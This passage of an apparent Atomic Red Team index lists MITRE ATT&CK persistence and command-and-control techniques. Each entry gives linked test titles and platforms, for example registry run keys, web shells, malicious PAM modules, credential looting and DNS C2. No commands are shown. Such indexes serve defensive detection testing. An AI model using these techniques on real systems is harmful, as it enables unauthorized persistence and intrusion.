- T1156 Malicious Shell Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1067 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1161 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1150 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- Atomic Test #1: Malicious PAM rule [linux]
- Atomic Test #2: Malicious PAM module [linux]
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1044 File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.013 Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md)
- Atomic Test #1: Append malicious start-process cmdlet [windows]
- T1501 Systemd Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1133 External Remote Services](../../T1133/T1133.md)
- Atomic Test #1: Running Chrome VPN Extensions via the Registry 2 vpn extension [windows]
- T1109 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.007 Kubernetes Cronjob](../../T1053.007/T1053.007.md)
- Atomic Test #1: ListCronjobs [containers]
- Atomic Test #2: CreateCronjob [containers]
- T1542.001 System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
- Atomic Test #1: Service Registry Permissions Weakness [windows]
- Atomic Test #2: Service ImagePath Change with reg.exe [windows]
- T1163 Rc.common [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md)
- Atomic Test #1: Add a driver [windows]
- T1013 Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.014 Active Setup](../../T1547.014/T1547.014.md)
- Atomic Test #1: HKLM - Add atomic_test key to launch executable as part of user setup [windows]
- Atomic Test #2: HKLM - Add malicious StubPath value to existing Active Setup Entry [windows]
- Atomic Test #3: HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number [windows]
- T1180 Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.003 Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md)
- Atomic Test #1: Modify Fax service to run PowerShell [windows]
- Atomic Test #2: Service Installation CMD [windows]
- Atomic Test #3: Service Installation PowerShell [windows]
- Atomic Test #4: TinyTurla backdoor service w64time [windows]
- Atomic Test #5: Remote Service Installation CMD [windows]
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- T1165 Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1137 Office Application Startup](../../T1137/T1137.md)
- Atomic Test #1: Office Application Startup - Outlook as a C2 [windows]
- T1098.003 Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.012 Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.001 Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- T1103 AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1137.006 Office Application Startup: Add-ins](../../T1137.006/T1137.006.md)
- Atomic Test #1: Code Executed Via Excel Add-in File (XLL) [windows]
- Atomic Test #2: Persistent Code Execution Via Excel Add-in File (XLL) [windows]
- Atomic Test #3: Persistent Code Execution Via Word Add-in File (WLL) [windows]
- Atomic Test #4: Persistent Code Execution Via Excel VBA Add-in File (XLAM) [windows]
- Atomic Test #5: Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM) [windows]
- [T1505.002 Server Software Component: Transport Agent](../../T1505.002/T1505.002.md)
- Atomic Test #1: Install MS Exchange Transport Agent Persistence [windows]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1162 Login Item [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.002 Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md)
- Atomic Test #1: Install and Register Password Filter DLL [windows]
- [T1505.005 Server Software Component: Terminal Services DLL](../../T1505.005/T1505.005.md)
- Atomic Test #1: Simulate Patching termsrv.dll [windows]
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
- Atomic Test #5: Google Chrome Load Unpacked Extension With Command Line [windows]
- T1058 Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.011 Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md)
- Atomic Test #1: Application Shim Installation [windows]
- Atomic Test #2: New shim database files created in the default shim database directory [windows]
- Atomic Test #3: Registry key creation and/or modification events for SDB [windows]
- [T1547.010 Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md)
- Atomic Test #1: Add Port Monitor persistence in Registry [windows]
- [T1037.002 Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md)
- Atomic Test #1: Logon Scripts - Mac [macos]
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1050 New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.009 Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md)
- Atomic Test #1: Shortcut Modification [windows]
- Atomic Test #2: Create shortcut to cmd in startup folders [windows]
- T1062 Hypervisor [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1182 AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1525 Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.005 Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md)
- Atomic Test #1: Modify SSP configuration in registry [windows]
- T1004 Winlogon Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1131 Authentication Package [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1152 Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.004 Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md)
- Atomic Test #1: Launch Daemon [macos]
- [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
- Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
- [T1505.003 Server Software Component: Web Shell](../../T1505.003/T1505.003.md)
- Atomic Test #1: Web Shell Written to Disk [windows]
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
- Atomic Test #2: Activate Guest Account [windows]
- Atomic Test #3: Enable Guest Account on macOS [macos]
- [T1547.003 Time Providers](../../T1547.003/T1547.003.md)
- Atomic Test #1: Create a new time provider [windows]
- Atomic Test #2: Edit an existing time provider [windows]
- T1183 Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1031 Modify Existing Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap EXIT [macos, linux]
- Atomic Test #2: Trap SIGINT [macos, linux]
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
- Atomic Test #3: Dylib Injection via DYLD_INSERT_LIBRARIES [macos]
- [T1136.001 Create Account: Local Account](../../T1136.001/T1136.001.md)
- Atomic Test #1: Create a user account on a Linux system [linux]
- Atomic Test #2: Create a user account on a MacOS system [macos]
- Atomic Test #3: Create a new user in a command prompt [windows]
- Atomic Test #4: Create a new user in PowerShell [windows]
- Atomic Test #5: Create a new user in Linux with `root` UID and GID. [linux]
- Atomic Test #6: Create a new Windows admin user [windows]
- T1053.001 At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1179 Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.011 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md)
- Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
- Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
- Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows]
- Atomic Test #4: Winlogon HKLM Shell Key Persistence - PowerShell [windows]
- Atomic Test #5: Winlogon HKLM Userinit Key Persistence - PowerShell [windows]
- T1019 System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1042 Change Default File Association [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1164 Re-opened Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
- Atomic Test #1: Modify SSH Authorized Keys [macos, linux]
- T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1101 Security Support Provider [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.012 Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md)
- Atomic Test #1: IFEO Add Debugger [windows]
- Atomic Test #2: IFEO Global Flags [windows]
- Atomic Test #3: GlobalFlags in Image File Execution Options [windows]
- T1177 LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.008 Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md)
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
- Atomic Test #2: Replace binary of sticky keys [windows]
- Atomic Test #3: Create Symbolic Link From osk.exe to cmd.exe [windows]
- T1504 PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1198 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1136.002 Create Account: Domain Account](../../T1136.002/T1136.002.md)
- Atomic Test #1: Create a new Windows domain admin user [windows]
- Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
- Atomic Test #3: Create a new Domain Account using PowerShell [windows]
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1138 Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.009 Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md)
- Atomic Test #1: Create registry persistence via AppCert DLL [windows]
- T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.015 Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md)
- Atomic Test #1: Persistence by modifying Windows Terminal profile [windows]
- Atomic Test #2: Add macOS LoginItem using Applescript [macos]
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1098.001 Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md)
- Atomic Test #1: Azure AD Application Hijacking - Service Principal [azure-ad]
- Atomic Test #2: Azure AD Application Hijacking - App Registration [azure-ad]
- Atomic Test #3: AWS - Create Access Key and Secret Key [iaas:aws]
- T1053.004 Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md)
- Atomic Test #1: Persistence via WMI Event Subscription - CommandLineEventConsumer [windows]
- Atomic Test #2: Persistence via WMI Event Subscription - ActiveScriptEventConsumer [windows]
- Atomic Test #3: Windows MOFComp.exe Load MOF File [windows]
- T1060 Registry Run Keys / Startup Folder [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1023 Shortcut Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.001 Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md)
- Atomic Test #1: Change Default File Association [windows]
- T1122 Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1015 Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.014 Event Triggered Execution: Emond](../../T1546.014/T1546.014.md)
- Atomic Test #1: Persistance with Event Monitor - emond [macos]
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md)
- Atomic Test #1: Reg Key Run [windows]
- Atomic Test #2: Reg Key RunOnce [windows]
- Atomic Test #3: PowerShell Registry RunOnce [windows]
- Atomic Test #4: Suspicious vbs file run from startup Folder [windows]
- Atomic Test #5: Suspicious jse file run from startup Folder [windows]
- Atomic Test #6: Suspicious bat file run from startup Folder [windows]
- Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows]
- Atomic Test #8: Add persistance via Recycle bin [windows]
- Atomic Test #9: SystemBC Malware-as-a-Service Registry [windows]
- Atomic Test #10: Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value [windows]
- Atomic Test #11: Change Startup Folder - HKCU Modify User Shell Folders Startup Value [windows]
- Atomic Test #12: HKCU - Policy Settings Explorer Run Key [windows]
- Atomic Test #13: HKLM - Policy Settings Explorer Run Key [windows]
- Atomic Test #14: HKLM - Append Command to Winlogon Userinit KEY Value [windows]
- Atomic Test #15: HKLM - Modify default System Shell - Winlogon Shell KEY Value [windows]
- Atomic Test #16: secedit used to create a Run key in the HKLM Hive [windows]
- Atomic Test #17: Modify BootExecute Value [windows]
- [T1136.003 Create Account: Cloud Account](../../T1136.003/T1136.003.md)
- Atomic Test #1: AWS - Create a new IAM user [iaas:aws]
- Atomic Test #2: Azure AD - Create a new user [azure-ad]
- Atomic Test #3: Azure AD - Create a new user via Azure CLI [azure-ad]
- [T1098 Account Manipulation](../../T1098/T1098.md)
- Atomic Test #1: Admin Account Manipulate [windows]
- Atomic Test #2: Domain Account and Group Manipulate [windows]
- Atomic Test #3: AWS - Create a group and add a user to that group [iaas:aws]
- Atomic Test #4: Azure AD - adding user to Azure AD role [azure-ad]
- Atomic Test #5: Azure AD - adding service principal to Azure AD role [azure-ad]
- Atomic Test #6: Azure - adding user to Azure role in subscription [iaas:azure]
- Atomic Test #7: Azure - adding service principal to Azure role in subscription [iaas:azure]
- Atomic Test #8: Azure AD - adding permission to application [azure-ad]
- Atomic Test #9: Password Change on Directory Service Restore Mode (DSRM) Account [windows]
- Atomic Test #10: Domain Password Policy Check: Short Password [windows]
- Atomic Test #11: Domain Password Policy Check: No Number in Password [windows]
- Atomic Test #12: Domain Password Policy Check: No Special Character in Password [windows]
- Atomic Test #13: Domain Password Policy Check: No Uppercase Character in Password [windows]
- Atomic Test #14: Domain Password Policy Check: No Lowercase Character in Password [windows]
- Atomic Test #15: Domain Password Policy Check: Only Two Character Classes [windows]
- Atomic Test #16: Domain Password Policy Check: Common Password Use [windows]
- [T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
- Atomic Test #1: Linux - Load Kernel Module via insmod [linux]
- Atomic Test #2: MacOS - Load Kernel Module via kextload and kmutil [macos]
- Atomic Test #3: MacOS - Load Kernel Module via KextManagerLoadKextWithURL() [macos]
- Atomic Test #4: Snake Malware Kernel Driver Comadmin [windows]
- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.006 Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md)
- Atomic Test #1: Create Systemd Service and Timer [linux]
- Atomic Test #2: Create a user level transient systemd service and timer [linux]
- Atomic Test #3: Create a system level transient systemd service and timer [linux]
- T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1157 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1505.004 IIS Components](../../T1505.004/T1505.004.md)
- Atomic Test #1: Install IIS Module using AppCmd.exe [windows]
- Atomic Test #2: Install IIS Module using PowerShell Cmdlet New-WebGlobalModule [windows]
- T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546 Event Triggered Execution](../../T1546/T1546.md)
- Atomic Test #1: Persistence with Custom AutodialDLL [windows]
- Atomic Test #2: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
- Atomic Test #3: HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation) [windows]
- Atomic Test #4: WMI Invoke-CimMethod Start Process [windows]
- [T1546.004 Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- Atomic Test #3: Append to the system shell profile [linux]
- Atomic Test #4: Append commands user shell profile [linux]
- Atomic Test #5: System shell profile scripts [linux]
- Atomic Test #6: Create/Append to .bash_logout [linux]
- [T1547.002 Authentication Package](../../T1547.002/T1547.002.md)
- Atomic Test #1: Authentication Package [windows]
- T1128 Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.015 Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md)
- Atomic Test #1: COM Hijacking - InprocServer32 [windows]
- Atomic Test #2: Powershell Execute COM Object [windows]
- Atomic Test #3: COM Hijacking with RunDLL32 (Local Server Switch) [windows]
- Atomic Test #4: COM hijacking via TreatAs [windows]
- [T1137.004 Office Application Startup: Outlook Home Page](../../T1137.004/T1137.004.md)
- Atomic Test #1: Install Outlook Home Page Persistence [windows]
- [T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- T1168 Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1166 Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.005 Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md)
- Atomic Test #1: Add file to Local Library StartupItems [macos]
- T1100 Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1034 Path Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1197 BITS Jobs](../../T1197/T1197.md)
- Atomic Test #1: Bitsadmin Download (cmd) [windows]
- Atomic Test #2: Bitsadmin Download (PowerShell) [windows]
- Atomic Test #3: Persist, Download, & Execute [windows]
- Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows]
- [T1546.010 Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md)
- Atomic Test #1: Install AppInit Shim [windows]
- [T1546.002 Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md)
- Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
- [T1543.001 Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md)
- Atomic Test #1: Launch Agent [macos]
- Atomic Test #2: Event Monitor Daemon Persistence [macos]
- T1519 Emond [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md)
- Atomic Test #1: rc.common [macos]
- Atomic Test #2: rc.common [linux]
- Atomic Test #3: rc.local [linux]
- T1209 Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1159 Launch Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.002 Create or Modify System Process: Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
- Atomic Test #2: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux]
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.007 Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md)
- Atomic Test #1: Copy in loginwindow.plist for Re-Opened Applications [macos]
- Atomic Test #2: Re-Opened Applications using LoginHook [macos]
- Atomic Test #3: Append to existing loginwindow for Re-Opened Applications [macos]
- [T1574.002 Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows]
- T1098.002 Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1084 Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1160 Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md)
- Atomic Test #1: Logon Scripts [windows]
- [T1137.002 Office Application Startup: Office Test](../../T1137.002/T1137.002.md)
- Atomic Test #1: Office Application Startup Test Persistence (HKCU) [windows]
- [T1547.008 Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md)
- Atomic Test #1: Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt [windows]
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
- Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
- Atomic Test #2: At - Schedule a job [linux]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.007 Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md)
- Atomic Test #1: Netsh Helper DLL Registration [windows]
- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #1: Create local account with admin privileges [windows]
- Atomic Test #2: Create local account with admin privileges - MacOS [macos]
- Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
- Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
- Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
- Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
- Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
- Atomic Test #8: Create local account (Linux) [linux]
- Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
- Atomic Test #10: Login as nobody (Linux) [linux]
- [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
- Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
# command-and-control
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1132.001 Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md)
- Atomic Test #1: Base64 Encoded data. [macos, linux]
- Atomic Test #2: XOR Encoded data. [windows]
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1071.004 Application Layer Protocol: DNS](../../T1071.004/T1071.004.md)
- Atomic Test #1: DNS Large Query Volume [windows]
- Atomic Test #2: DNS Regular Beaconing [windows]
- Atomic Test #3: DNS Long Domain Query [windows]
- Atomic Test #4: DNS C2 [windows]
